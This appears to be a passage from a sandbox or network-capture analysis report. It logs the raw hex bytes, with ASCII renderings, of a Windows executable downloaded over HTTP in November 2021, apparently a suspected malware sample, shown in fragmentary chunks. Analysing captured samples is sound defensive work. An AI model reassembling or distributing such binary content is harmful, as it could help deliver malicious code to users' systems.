                                                                                                                                                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uHQZDM5SSI5ggRS3yf%2BK2IntIGvYyqNCFqf7Eo0P661dwUExAR1h4W3yxQSnDoSCItIa1ecA5FsBReBzwZlyUxF3DyGTTBiBZpROfxSKybVIrWg2fiY4YxVL9IUreh5WtPQytQ%3D%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                2021-11-11 11:26:10 UTC2714INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 76 f8 d1 d1 32 99 bf 82 32 99 bf 82 32 99 bf 82 26 f2 bc 83 39 99 bf 82 26 f2 ba 83 f3 99 bf 82 54 f6 42 82 33 99 bf 82 60 ec bb 83 23 99 bf 82 60 ec bc 83 38 99 bf 82 60 ec ba 83 7c 99 bf 82 87 ec bb 83 23 99 bf 82 87 ec ba 83 31 99 bf 82 26 f2 bb 83 26 99 bf 82 26 f2 b9 83 33 99 bf 82 26 f2 be 83 23 99 bf 82 32 99 be 82 96 99 bf 82 87 ec b6 83 30 99 bf 82 87 ec 40 82 33 99 bf
                                                                                                                                                                                Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$v222&9&TB3`#`8`|#1&&&3&#20@3
                                                                                                                                                                                2021-11-11 11:26:10 UTC2716INData Raw: d1 89 be 5f b0 d6 e1 1f c5 a5 21 33 0f ac 5f a8 e6 08 fe bb dd 71 82 cb 32 7d 20 68 b6 49 ac 27 2f f5 78 7a 0c 42 ee 32 67 ae 0e 56 46 5d 9b 73 ac 75 f9 97 68 1e db d7 4a 2a 55 2b 26 60 56 4e 7b d8 f9 98 93 e2 e7 cc b7 7c bd f3 e6 43 dc 7c 90 f2 99 09 53 e3 f6 b7 74 7d 48 b7 37 bd 07 f3 b6 8c d3 b5 b5 4d c9 77 65 20 b9 96 8e 87 9f 1e 87 d9 51 6b 2f a0 db 61 7e ab e1 ae f0 a1 f9 5f 9f 10 a2 3b 7e 55 ac 4b fa 6b df ae f6 79 fb 4e f1 69 a5 a4 02 70 c8 71 9f ee e1 24 b4 cf e4 a2 b2 30 09 a8 35 e6 89 bb 97 d1 e1 39 f0 61 9b 50 60 78 92 70 e5 55 32 a9 7a 12 10 77 e5 58 f5 cf 8a 18 71 09 aa d6 da 45 30 ff b0 3b 3f 50 12 b8 2e 60 a3 43 78 49 a9 4f bf a4 af 06 f6 8d 3a e0 5a 90 c5 7c 06 59 1b b4 ca ed a1 e5 99 d5 1f 63 eb 46 f5 77 58 6e 77 31 f3 d6 1c 42 76 af 11
                                                                                                                                                                                Data Ascii: _!3_q2} hI'/xzB2gVF]suhJ*U+&`VN{|C|St}H7Mwe Qk/a~_;~UKkyNipq$059aP`xpU2zwXqE0;?P.`CxIO:Z|YcFwXnw1Bv
                                                                                                                                                                                2021-11-11 11:26:10 UTC2717INData Raw: 72 38 b8 bf fe 7b 75 75 72 e1 6e ea de 65 48 5c 80 18 6b 15 ed 9f 8b 24 c8 4e 6a a0 14 69 99 4a 5e a5 39 02 75 f9 14 ef ea b4 09 8e 69 4c 5f a6 32 9a 0d c5 4d b6 ea b9 ea b3 9f c6 ba f2 95 34 f7 79 cd c6 49 75 94 d8 97 67 b0 55 c3 91 19 a4 54 69 73 38 cb cf ec 5c c9 04 7a e3 66 65 c9 3e e7 65 c3 96 73 b2 73 ec 82 6b ce a9 62 a2 62 77 85 aa ba b5 cd fd f8 92 50 18 5a 88 11 94 fc da b4 a2 3c ec b6 e9 37 6c 43 84 e9 d7 2b 96 fd 87 73 15 82 27 51 5c a7 a4 84 a0 cc b0 1e ac 62 af a7 9a 28 28 d6 a1 0a 96 a1 da df 0f 7a 5c b6 a7 fc b9 b5 0d 5a 2f 24 63 c1 6e d8 11 61 91 2b c2 07 bb 27 b6 50 b8 d1 7b 81 6a 35 59 4f c4 83 02 7c 20 05 7c 2a 99 37 be ef 9a 7b c3 ca 3d 38 96 61 fe 29 18 49 dd db d8 08 ed f1 bc 1b 3d 78 f3 0c 3a 3b 82 c5 29 ff 4c 70 df 3f bc 95 53 15
                                                                                                                                                                                Data Ascii: r8{uurneH\k$NjiJ^9uiL_2M4yIugUTis8\zfe>esskbbwPZ<7lC+s'Q\b((z\Z/$cna+'P{j5YO| |*7{=8a)I=x:;)Lp?S
                                                                                                                                                                                2021-11-11 11:26:10 UTC2718INData Raw: bb 5f 62 c7 31 12 76 d5 c5 ca 73 d6 e4 e9 01 2b de cd 8e 09 a0 94 f0 eb 0f ca e3 aa 20 cf 28 54 2c 07 b6 e4 6d d6 f8 b1 40 50 e6 b4 23 5f ed 50 94 73 93 a3 a8 0b 7c 95 24 64 0e ad 90 74 30 00 74 b2 35 b2 99 ee 26 e0 90 11 5b c9 90 77 a5 4c 4f 38 96 d3 10 ba 3f e7 de 93 73 7f f8 52 3b 69 0b 8b 50 7e 16 04 3f 10 1a 74 7c 43 95 b0 2d a6 d8 b9 84 2b e2 bb 4a a3 b4 95 c0 94 06 91 0c 5b a8 bf 9d c6 a3 81 86 82 4c 20 3a 1e 67 c2 b5 80 88 a8 87 80 32 1b ff 73 5d bf ca 13 bc b6 71 40 61 23 80 72 b9 37 d8 0b 4d d5 d6 63 b9 be 8e 6a 03 7f ea bf 7d a2 a2 60 a8 5f 40 53 6b a5 63 aa 21 e6 aa 54 db 13 00 97 7f 35 e2 ad 69 d3 b9 9e 4d a5 ec 39 c3 1d 4f fe 10 75 48 d2 c2 40 f2 9d 70 e7 da 6e 81 cb 0a e3 8f cf be 09 b7 cd 56 77 49 00 ce 2d 3b 46 fe e8 2c 60 89 94 ed 1b ad
                                                                                                                                                                                Data Ascii: _b1vs+ (T,m@P#_Ps|$dt0t5&[wLO8?sR;iP~?t|C-+J[L :g2s]q@a#r7Mcj}`_@Skc!T5iM9OuH@pnVwI-;F,`
                                                                                                                                                                                2021-11-11 11:26:10 UTC2720INData Raw: 89 a7 ca 6c 1f 5b d8 bf 50 a7 4c e4 f6 6c 58 96 97 be 2b ec e7 48 11 7e eb 1c cb ba 8b 7f 50 82 9b 6f ad af 91 67 09 76 88 9f 21 54 ba aa 7c c2 fa 2c 12 d7 78 86 34 8c 6a 8e 68 91 54 6d 51 8b f0 8c 60 a1 b0 c9 b9 84 0f 8f 8d e1 41 f1 89 03 83 45 5d e6 44 34 3b 58 58 75 4a 1c be 75 43 a7 a8 ab 50 b2 b7 e4 55 9d 2e 2e ff bc f4 cc 0d 39 c8 26 5d 99 d7 db 07 c1 7d e7 44 43 a7 e5 74 b4 71 8f 71 a2 38 45 89 9b 92 5e 9a 18 b8 f5 4a da e4 74 49 39 f6 ce c9 41 37 3d 49 6a fb a7 81 7e c8 38 e3 e5 c3 af b9 77 9b 08 f7 66 e6 e4 a1 f3 6b 62 c7 47 db 37 68 48 bc f2 39 d9 27 59 b6 58 fd e6 0a bf 64 2a 2e e9 bc 64 38 7b f7 37 92 f9 99 18 d3 2b 57 5d 36 36 b7 64 10 ed a6 e9 7d 81 be 0f f9 24 3f 25 55 fc c9 b4 9f 30 70 7f 05 a0 08 b0 31 46 45 a4 56 c1 70 9a 34 0e c9 83 ae
                                                                                                                                                                                Data Ascii: l[PLlX+H~Pogv!T|,x4jhTmQ`AE]D4;XXuJuCPU..9&]}DCtqq8E^JtI9A7=Ij~8wfkbG7hH9'YXd*.d8{7+W]66d}$?%U0p1FEVp4
                                                                                                                                                                                2021-11-11 11:26:10 UTC2721INData Raw: 5a 61 28 c9 ba 1c 83 a5 86 e2 c9 c5 8a f0 93 57 ac 95 57 24 2a 77 c4 96 a6 bb 99 0f e8 1f af 68 89 70 e7 62 fa f7 29 95 e1 e1 8a 03 4a a4 a9 73 77 8f d3 32 ca 83 50 88 20 6c 40 27 68 e9 ac 30 9a a1 94 9e b8 39 b0 98 d2 0e 8c 3c ea 64 88 a9 dc 64 c1 c0 7c a4 14 45 10 85 50 bb ce 71 94 01 dc e1 83 7c 20 35 78 14 b6 33 aa 67 a1 a0 72 59 09 71 81 40 60 70 f9 b2 90 27 c5 79 ed 59 f9 5f 5e 71 17 79 68 d7 b2 18 26 00 45 1c db e3 11 07 1b 1d 6e 48 a8 14 de f1 c7 c7 4a ab 29 75 79 a9 1f 44 93 c4 45 c1 7b 58 82 54 8b ef 52 52 81 38 a8 8c d8 74 9e 57 bd e8 c3 7e ea 32 fc b1 b5 e1 e4 33 e3 3b 29 6a e6 b5 eb 65 96 b3 b3 5f 79 1b 5d 54 dc 5f db 07 64 df 1c 57 b9 59 8a 10 b5 98 cc 73 85 7d 86 dd 4a 6b 73 2b 42 20 7c 52 e6 97 3b df ec 35 31 19 a2 95 b2 b9 73 aa e5 92 39
                                                                                                                                                                                Data Ascii: Za(WW$*whpb)Jsw2P l@'h09<dd|EPq| 5x3grYq@`p'yY_^qyh&EnHJ)uyDE{XTRR8tW~23;)je_y]T_dWYs}Jks+B |R;51s9
                                                                                                                                                                                2021-11-11 11:26:10 UTC2722INData Raw: 02 9f 1e 31 86 05 df 2f 95 da 7c 25 bd 99 f8 6c c8 26 be 69 93 52 7e b0 aa 5d 96 6f 5a e9 b5 b9 ae 80 45 29 30 ef 1d 98 7a 41 2f ab 81 a6 3c 24 74 e8 e2 ca c4 cc 6a 3e b9 9b d4 5e 56 ff 7a 56 a3 dd a2 dc 8e 5c b1 44 76 4b f2 76 94 55 80 38 e4 c3 93 44 45 7d 85 e5 c6 9b b7 6b 2a 89 df 78 28 f0 f1 aa 10 d2 3c f1 4d 6b 6f c6 76 97 e8 b5 97 e6 85 4b 0c b6 b7 7e 2d da 4b 0b 54 db b5 b6 ec 49 63 8e 92 3f fa aa e8 9f a7 51 63 14 69 fa 6b c1 e0 31 70 e8 71 5c 01 81 a4 37 62 e1 07 f2 e3 41 49 88 81 b6 28 55 14 9a f0 75 97 e9 4b b7 17 de 42 e5 64 97 1f ae 5c 10 5a 9f 64 bf 6c bc 6d 16 e5 08 41 53 37 cd 6f 0b 7d 41 cd 88 35 7a 79 c1 18 51 f1 9f 37 8a 4d 97 43 82 68 fa b4 ba 0e 21 9a 35 15 b1 97 9b 8b e9 93 30 59 de bf ed e8 a9 7a 77 63 91 a7 c8 2b a5 45 be 89 ef f6
                                                                                                                                                                                Data Ascii: 1/|%l&iR~]oZE)0zA/<$tj>^VzV\DvKvU8DE}k*x(<MkovK~-KTIc?Qcik1pq\7bAI(UuKBd\ZdlmAS7o}A5zyQ7MCh!50Yzwc+E
                                                                                                                                                                                2021-11-11 11:26:10 UTC2724INData Raw: 69 e9 ab fe a6 04 cd d7 86 3e 40 0a c8 06 d6 b7 f0 b0 f2 76 4b 48 95 4c 53 09 5a ec b8 75 0b 23 3a ee e2 ed 78 f4 4e 17 b7 c9 39 74 30 5a 19 88 ed 0b fa f5 fb 42 86 aa b8 d8 7e b3 cf ee 3f 40 8e d4 93 a5 2f 82 cf 89 1f f5 63 ef ee a4 e8 99 d0 69 73 2f ab 31 ad 98 16 6b b5 06 11 28 5d 09 11 1a af 67 ff 9d 7c 50 e3 ef 5d d2 6c 96 78 85 9f 22 16 35 e0 77 5d a2 25 57 da ef 28 c7 42 82 22 df bc a9 5a 71 ac f4 ad 67 16 89 8f 64 62 50 0e b9 c4 e8 1a 85 81 3b 16 40 23 3f 89 84 f5 97 b5 be 90 cd d0 35 ff 23 1b 56 93 09 9b 24 ad 75 e8 26 7a 06 04 31 4a 70 86 18 bb 6a 1d 26 24 d4 99 91 bb 0a 0e d4 28 76 f0 50 03 9f c8 f8 30 fe 9f ed ff 9f 3d d1 72 ea bd 71 65 c7 90 c5 13 8c 79 97 85 52 0a b9 ba 78 df 49 b9 fc 77 bf f2 a7 48 bf 25 13 1d 5f f1 81 5d 4b c6 cb eb 26 0d
                                                                                                                                                                                Data Ascii: i>@vKHLSZu#:xN9t0ZB~?@/cis/1k(]g|P]lx"5w]%W(B"ZqgdbP;@#?5#V$u&z1Jpj&$(vP0=rqeyRxIwH%_]K&
                                                                                                                                                                                2021-11-11 11:26:10 UTC2725INData Raw: 58 8a 78 a9 4f a8 94 16 a2 2d 33 fd f7 af b6 82 58 28 82 30 0a 8d 61 2d de 3e 70 5c 57 47 d0 69 5c 93 b9 2a ec 5d 95 c0 bf 89 51 86 23 89 e7 48 80 83 59 e8 94 d1 4f 82 2f 2d eb d5 27 06 b6 e9 39 59 56 0a 88 8b bc 58 6d f6 f6 34 69 7f 93 d0 b3 d6 63 da 91 4e a8 20 74 41 b3 ff 3e db 69 d1 14 81 45 0c ff bb 30 95 c4 8a 14 a6 d9 ce f9 ed 97 14 b3 cb 6b 31 39 5d 4b e2 95 e7 77 8c aa a8 49 71 0a fe e5 91 04 e2 bb 25 ae 28 fe 0c a7 cc 42 20 0a 04 5f 5a a8 69 1c 9b 01 eb aa 2d 5b 09 36 ce 34 a9 6c 58 ff 14 36 2f 9d e6 b1 b9 2a 6d 91 eb 1d 9a 40 a0 75 ed 18 95 44 2c b3 d9 96 63 78 4e 4d 9b 4c de bb 38 a7 03 ab 09 66 50 99 9b d8 09 7b 1a 9c c6 5f 63 b0 44 70 af 49 fe 13 82 21 15 d1 88 99 30 e7 57 5c 79 ef 7f 9a 0b 44 d1 1e fa ae fa 52 39 84 d0 89 5e 2b 9d a8 45 52
                                                                                                                                                                                Data Ascii: XxO-3X(0a->p\WGi\*]Q#HYO/-'9YVXm4icN tA>iE0k19]KwIq%(B _Zi-[64lX6/*m@uD,cxNML8fP{_cDpI!0W\yDR9^+ER
                                                                                                                                                                                2021-11-11 11:26:10 UTC2726INData Raw: 7b 71 ea ba 75 69 45 7c 93 ae 9f bd cc 45 15 35 4e 60 6a 04 87 63 fd 07 71 25 1f 9c 38 49 d2 34 72 96 32 01 e9 a8 63 7c 95 7d ff 5f c4 b5 3a b7 d7 e1 8d df fc d8 dd f9 e7 0b f2 ca 56 32 a5 6f 76 da 69 29 ce 09 cc 5c 29 98 64 05 e0 39 94 b2 b5 85 4c a3 e8 e6 41 a3 ed 8d e9 61 de 2e e9 71 51 d9 35 9e d2 f1 59 38 4d 54 41 af 04 57 e1 4f 51 bc 74 1d 36 d8 1b c8 29 30 dd f0 ae 08 e9 c5 4e 2e 5a e0 b3 0f ed 2e 02 e8 40 b9 f1 05 93 72 24 71 00 12 f1 d4 fe 11 f8 35 e1 b9 9d e1 9e c9 ce 64 bb 0d a7 4e 22 cc 6a 79 5c 8a 7a 75 61 07 e0 96 84 0e 09 a8 ca 43 ae 5b 63 d1 37 c5 48 d0 93 01 15 cb cf a3 e0 e4 95 43 3b 41 aa ad 21 4b 16 9c 97 c0 b0 e9 9a b7 e9 4b fb f7 cd 77 1e bd da 44 0b 2b ef cc 7b 64 cd 88 69 50 0f 8e 23 2e de 1e d8 49 28 d9 bc 3f 16 c6 76 49 cc d6 b5
                                                                                                                                                                                Data Ascii: {quiE|E5N`jcq%8I4r2c|}_:V2ovi)\)d9LAa.qQ5Y8MTAWOQt6)0N.Z.@r$q5dN"jy\zuaC[c7HC;A!KKwD+{diP#.I(?vI
                                                                                                                                                                                2021-11-11 11:26:10 UTC2728INData Raw: f4 9f 25 b8 09 06 44 99 16 b5 7a 93 7d 5d 3f b2 42 a0 bb 8f 52 f1 15 9b 75 96 09 b6 e2 ec 9b d8 52 ef 6a f1 87 62 7b ae 66 6b e9 05 8b 11 41 a3 c3 e9 b6 bd 56 67 98 bd 39 b1 3b 39 ed 0e 1a f7 08 f2 60 fc 5a cf 0b c0 d9 10 70 5f 63 cb 7c a5 ad 11 87 a2 00 78 3d cd 85 32 e8 f6 50 15 09 84 b5 b5 13 0a 1e 55 e4 37 1b c1 e9 91 5e fb ca 24 08 fc 7d 39 4d 94 29 6f 1a b5 15 33 6e a6 32 95 90 f3 53 e5 92 6b f4 4e aa 0b 14 58 51 9f 2f 04 4a 38 50 0a 48 a9 0a 3c 12 7a de a7 d5 c4 42 72 7f df 38 b5 4d 10 45 da 50 9d 62 46 8e f7 54 2f 2a 16 8b a8 41 dc a4 1a 3a 58 c0 17 96 88 bc 68 0c 7b c7 2c 0b 84 f9 6b 93 51 70 45 d7 26 d8 3a 59 37 e3 b6 cc f7 ff 07 a1 83 b2 9f a7 9b 37 74 d5 eb 57 21 52 0a 48 f6 af 69 dc 91 61 1f fc 74 62 28 30 5a 21 07 85 3f 6a 6f 7b 52 95 d7 80
                                                                                                                                                                                Data Ascii: %Dz}]?BRuRjb{fkAVg9;9`Zp_c|x=2PU7^$}9M)o3n2SkNXQ/J8PH<zBr8MEPbFT/*A:Xh{,kQpE&:Y77tW!RHiatb(0Z!?jo{R
                                                                                                                                                                                2021-11-11 11:26:10 UTC2729INData Raw: 8e 1d 50 31 e0 6b 4e b3 c9 f6 69 65 de 3b 35 77 f0 28 16 c2 89 55 86 c6 27 86 5c 21 83 c6 83 04 83 b0 bf 17 af 51 f9 0a d5 45 20 b7 e1 b9 96 89 a1 aa 53 ed f5 14 e6 68 e1 6f ea 65 18 8f d1 10 db 2f e7 df ae b5 c9 b0 09 c0 99 49 e2 5f b9 59 f0 6a b6 50 b6 5b ea 09 b9 37 62 e8 6f d9 e6 81 55 d8 80 09 c5 20 87 06 a4 37 08 bc c2 17 24 89 18 6e 23 34 be 7f 33 bd 91 14 38 d9 95 df 8e 09 a3 72 ec f8 ea ef 18 71 22 53 c6 bf 91 eb 96 73 f1 9b 6d 34 21 37 2e 6b 31 76 48 a5 fd f5 8c 61 bf db 3d 6c 59 d3 66 84 eb 6e 31 a4 52 5c 70 15 4a b0 a7 2c c1 5e 04 84 1d b0 f7 17 c9 30 34 03 ae d8 ef 40 de ec 2a b3 9c 8d 35 61 e0 e0 17 22 de 97 3f 96 51 f6 8b 94 62 0e c6 b9 58 80 b6 69 e9 c2 b6 ae 4a c9 96 a7 58 e6 b6 ae c9 42 83 03 24 ab 43 7e 05 ec d6 2d e1 19 bd a6 75 3f e0
                                                                                                                                                                                Data Ascii: P1kNie;5w(U'\!QE Shoe/I_YjP[7boU 7$n#438rq"Ssm4!7.k1vHa=lYfn1R\pJ,^04@*5a"?QbXiJXB$C~-u?
                                                                                                                                                                                2021-11-11 11:26:10 UTC2730INData Raw: 26 39 47 c0 45 8e 4c cf c0 36 0e 76 91 e7 f5 72 4b 78 76 40 46 e1 3a e2 8d 29 f5 02 74 53 ef 6c e6 b3 2c 4b 62 7b 8c 97 58 b3 6f 99 29 28 2e c1 aa 5c b7 09 a3 f1 fe e2 a8 40 6f e6 bf d9 7a b9 03 e6 76 61 61 d1 19 58 eb 5d 5f 51 bd a8 36 97 57 b0 60 7b 9c a6 98 84 f1 29 d0 a8 18 3f 60 8a 72 7c c5 57 fa bd 2b 9a 10 86 b8 b9 d6 cd 13 e1 e3 ac 83 b2 8a 88 3c 76 b8 a1 56 f6 25 e4 73 87 03 fe 16 49 2f b2 13 59 f8 d9 50 f7 8d b3 3a 93 53 a0 13 61 68 2e 76 91 90 40 08 14 5c 1b 77 d7 3d b9 41 68 90 1f dc 6b 6a 3f 44 1b 46 b7 69 cd 91 5b 28 df af 8f df 28 92 fa fc 6b 82 2a 67 55 93 41 cd aa 36 ff 48 e2 a5 b7 bf 00 d7 e8 3a 4f 73 48 76 34 b0 fb 3c 9b 62 67 50 16 fe 96 29 c4 73 ea 62 c8 ca 59 e9 c9 04 ec d7 f6 70 57 33 ea 9f db 63 21 18 70 62 e2 24 ab 43 4b ae d0 6e
                                                                                                                                                                                Data Ascii: &9GEL6vrKxv@F:)tSl,Kb{Xo)(.\@ozvaaX]_Q6W`{)?`r|W+<vV%sI/YP:Sah.v@\w=Ahkj?DFi[((k*gUA6H:OsHv4<bgP)sbYpW3c!pb$CKn
                                                                                                                                                                                2021-11-11 11:26:10 UTC2732INData Raw: 16 30 80 aa 7f 66 3b fc 58 45 ea f6 a4 15 c5 37 87 1f dc 69 6e be f0 b7 65 8a b8 cb 56 a7 ea 2d a4 15 c4 b8 ef 8a 05 66 ed 8a 3d 3d 96 d3 23 ac a9 44 61 3d a3 d2 2b 0d bb e9 24 11 5c e5 39 7f 4e 67 2b 20 14 25 77 df c5 17 b4 bc 47 dc b4 8f 25 13 6a 22 63 7e a5 b8 0e 0e ea b6 37 ce 91 a6 f3 76 84 f7 87 02 58 73 e1 32 72 be f4 03 36 95 f7 2e f1 68 2b 53 1a a0 c6 e1 ea 67 2f ba cb 0a 8f d2 e9 de ff d4 0d 51 b0 6c 89 e7 09 7c 8c aa 15 0c 88 cf 86 b1 f5 b4 58 04 3e 9d 6f bb b1 fc d9 14 0d da e4 5f 59 e7 d8 b5 ed d6 13 a9 6c e9 f0 99 58 db 60 29 8f 37 d1 04 7d 4e ea a6 11 e6 78 30 b9 52 8c 0c 80 7a 9e 24 fd 6f 69 e3 81 9b e6 76 5d 41 fe d7 9c d1 43 f4 e0 23 a1 46 cd 96 3b 85 d9 bf ce 3c 39 29 84 98 a4 c9 e6 74 84 a7 53 52 e9 67 89 d6 e1 b5 46 55 d1 29 fb 91 54
                                                                                                                                                                                Data Ascii: 0f;XE7ineV-f==#Da=+$\9Ng+ %wG%j"c~7vXs2r6.h+Sg/Ql|X>o_YlX`)7}Nx0Rz$oiv]AC#F;<9)tSRgFU)T
                                                                                                                                                                                2021-11-11 11:26:10 UTC2733INData Raw: ff 7a ba 8c be 4e bf f5 e8 f4 0a ff c9 ef 97 0f e3 a2 36 8c 76 f9 f1 a8 c1 da 37 04 13 86 b4 a7 76 bb 72 ce 9f 75 3b bf 48 36 a2 e2 2a 08 78 f2 89 f0 97 9e 85 c2 2e bd 57 aa 8c 76 9a ea 4f 2e 57 53 68 d5 76 3d cc 79 d2 c0 a1 95 41 26 df 6e 3d 21 39 b6 6b e0 24 96 07 9d 1f be 13 4d 50 45 f8 39 f8 34 ef c1 d2 eb 82 8b 19 78 18 59 d0 94 c9 6e 6e 4e 3e 62 07 e0 c3 e0 47 d7 51 e2 b7 e9 93 d8 68 6c 79 da 68 a8 5b dd 89 86 17 b2 5e 8e e0 e2 5f 9b 59 98 97 48 5b a7 b0 4d 0c b5 63 a0 73 52 7c eb bf 79 29 24 ff 4d 46 dc c3 36 37 8e 99 f9 97 d6 fa 76 00 18 8e 2a d9 8e 07 3a f0 25 58 31 bc 1d a9 a7 d3 15 f1 e9 37 c4 dd f0 64 18 6e e5 b8 50 a7 32 88 e6 2f c1 ec d8 91 99 2b c4 0c b2 8e 80 2a 8e 2f dc 8e fb 13 5b 8a 22 e7 25 95 69 e1 9a de c4 9b d6 95 16 09 ea 31 a3 5d
                                                                                                                                                                                Data Ascii: zN6v7vru;H6*x.WvO.WShv=yA&n=!9k$MPE94xYnnN>bGQhlyh[^_YH[McsR|y)$MF67v*:%X17dnP2/+*/["%i1]
                                                                                                                                                                                2021-11-11 11:26:10 UTC2734INData Raw: fc b6 c8 67 60 b0 22 0d 89 e6 4d 3d f3 7c 70 84 f4 f5 68 1b 3d 90 36 fa 22 49 55 95 6a 91 73 ca 36 e9 98 fe ec 70 60 48 75 91 ea ca f9 01 a8 f9 e0 57 e6 10 8f 73 9e f3 7d 3b 03 eb 6d 48 68 75 63 7d 57 27 12 f6 ee 23 a2 31 2e 03 ed bb e5 7e 64 95 aa d0 3d b4 47 33 52 4b 27 1d dd 16 9c f8 9a 68 8d e2 9f f3 ae e1 ca 6a 01 a3 92 9e 85 ab 3b d3 81 42 34 37 a6 bf f9 92 92 ac 5e 8b da 89 f2 f5 46 65 44 5f c2 5a 2a 4d 73 68 eb 88 a1 4a fd eb 86 8a 5c 94 46 f9 09 09 55 23 4e 4f fa 20 42 24 6a 21 ba f8 ac 2c c1 f4 24 00 93 5a ec a9 75 cb 3b 3a d4 b1 0b ac cd 4a 3c 51 d7 6c 06 e8 bc 40 ac b8 e9 70 af b1 cd e2 03 e3 fc b3 21 0e 8c 42 ef fe 2b ef e7 20 c2 cb 76 40 37 b1 6c 85 8e 69 25 45 44 69 e8 09 fa be 2a 9e 55 48 09 af e1 6f 03 18 4d 7c 07 2b b0 5e af e8 1e 2b 9c
                                                                                                                                                                                Data Ascii: g`"M=|ph=6"IUjs6p`HuWs};mHhuc}W'#1.~d=G3RK'hj;B47^FeD_Z*MshJ\FU#NO B$j!,$Zu;:J<Ql@p!B+ v@7li%EDi*UHoM|+^+
                                                                                                                                                                                2021-11-11 11:26:10 UTC2736INData Raw: 16 59 ca 1e b6 be aa 4f 56 94 c9 bf 4b e9 fb 52 7d 82 00 5a 75 be a6 12 6c 8d 13 14 f5 eb 17 c4 86 6a ce 25 0b e1 b5 77 b3 9c e8 52 a7 bc d7 8b be f1 74 f9 3c ba 5c 3a 54 8e 54 33 e1 66 4c 9b f0 b6 4e 9c cd 5a 6c cb 98 18 49 de 10 04 60 b7 88 26 41 72 52 c2 d4 29 c9 8d 4a eb 2b c3 6f 82 33 90 09 2d ee 57 b3 7f 75 bc 79 85 44 ef 1b 27 34 2a ad 94 9f ae ab e9 58 12 b1 5e 00 69 7c 22 6b 82 f7 60 89 0d 55 f7 7e cc 25 89 8c ba 5a 0b 75 92 52 ed 89 2f b2 e2 8c 06 a0 9d 37 e2 4e 4e f5 4d 07 4c fe 7f 5c f6 ac ea 63 ea b8 ee f0 5a 63 ef e7 ff 03 c6 e8 64 17 c2 07 ab 22 ee 5d 7a f6 ae b7 9b 69 66 50 9d 10 17 91 4b 05 f5 77 88 01 1a 80 6d 6f ea d5 81 79 34 57 49 7b 78 af 0b 5e 3b b4 bc 54 3b 3f 24 83 21 2b 49 72 80 d4 16 24 37 08 1d 7a e9 83 25 4e 2e 43 9c 1a 60 dd
                                                                                                                                                                                Data Ascii: YOVKR}Zulj%wRt<\:TT3fLNZlI`&ArR)J+o3-WuyD'4*X^i|"k`U~%ZuR/7NNML\cZcd"]zifPKwmoy4WI{x^;T;?$!+Ir$7z%N.C`
                                                                                                                                                                                2021-11-11 11:26:10 UTC2737INData Raw: cc 92 e8 ba 20 e8 fa 92 4a 71 52 47 70 b7 ea 30 b2 a1 93 0b 55 e1 8b ab 76 c6 22 f7 2a 05 d0 4f 6e 5f aa 44 83 67 60 bf 46 de 57 ba 4e 78 47 29 87 13 ea e6 0b 44 e9 b7 ab 21 98 30 70 08 3d e4 2d e1 10 4a 6d ab a3 30 4f c0 72 37 4a 7e a7 d9 d7 a9 66 dd 89 25 e1 63 f3 8e 0c 19 2e 7b 8e 70 5a 61 58 d6 fd 5d d9 bf b5 83 86 fa 63 a2 d1 13 2a 73 89 65 e1 d6 9c 8e 0c 30 fa 67 65 f6 f9 e1 68 1c ea 52 b1 6a 0a 95 9b 7f 5e 2f 1f 02 e9 38 73 76 e5 c5 63 62 b9 bf 68 d9 c9 ad 42 d0 b1 b9 4d 8f 1c 48 09 aa a9 8b 57 7c 0d 00 f5 e2 13 c3 a1 40 76 0d 48 84 93 4a 9b d8 20 49 e6 56 89 b7 49 d9 da 81 23 e5 19 93 e2 36 f4 48 de 69 d7 64 fa c5 d9 19 28 cb bc 71 dd e1 54 68 b6 fd 9e b9 8b ce 70 60 18 d9 db 16 8a ef 29 b2 f5 95 f1 72 b4 43 cb d2 d8 27 a2 2c b6 9d e1 97 8f 43 2f
                                                                                                                                                                                Data Ascii: JqRGp0Uv"*On_Dg`FWNxG)D!0p=-Jm0Or7J~f%c.{pZaX]c*se0gehRj^/8svcbhBMHW|@vHJ IVI#6Hid(qThp`)rC',C/
                                                                                                                                                                                2021-11-11 11:26:10 UTC2738INData Raw: 2d b2 b9 4f f9 8c 6f 2f a1 eb 0f 8a 81 e2 34 5d aa e5 49 b4 e1 6d fa bb f1 e7 5c eb b2 7b c9 0e b0 71 23 e5 2c 28 d4 84 9e 8a 02 e6 6b 3e 33 45 2a 9b 5b b7 34 0f 07 ed 43 71 bb 20 40 79 a9 d6 49 64 89 2b c1 6c 22 53 73 e0 ff 97 31 f1 9f 32 31 da d5 3d 86 e9 35 ea c1 19 2d 6d 81 c5 2a 9f fb 09 4c ba ad 88 cc 6e af 48 58 2e c1 e1 8d 1b b5 11 be 79 a1 3a 4f a7 6d 89 cb ad 57 99 4a f6 60 b9 31 d6 fc 1d 2f c8 29 fd 87 b5 bd 29 d9 6e 65 fa 4f a7 27 54 80 2a a7 04 3a 86 29 ab 68 b0 71 29 7a 9d fc 21 3f 6a f1 bb df 97 d1 f1 ff 32 57 39 4a 56 5e 9e 9d aa 2d 91 8f 2b 61 69 9d 87 b5 6a bd 2d 31 e1 cb 1a b5 c1 bf 3f a1 c0 b4 a7 43 e9 38 ad 71 f1 5f 32 57 99 49 f6 e8 76 0f a0 7b d1 ba ad 16 95 97 ff 19 e3 1f e9 13 05 9e e8 43 84 18 39 61 d1 51 ad 6b 8a 50 a3 c5 d9 e0
                                                                                                                                                                                Data Ascii: -Oo/4]Im\{q#,(k>3E*[4Cq @yId+l"Ss121=5-m*LnHX.y:OmWJ`1/))neO'T*:)hq)z!?j2W9JV^-+aij-1?C8q_2WIv{C9aQkP
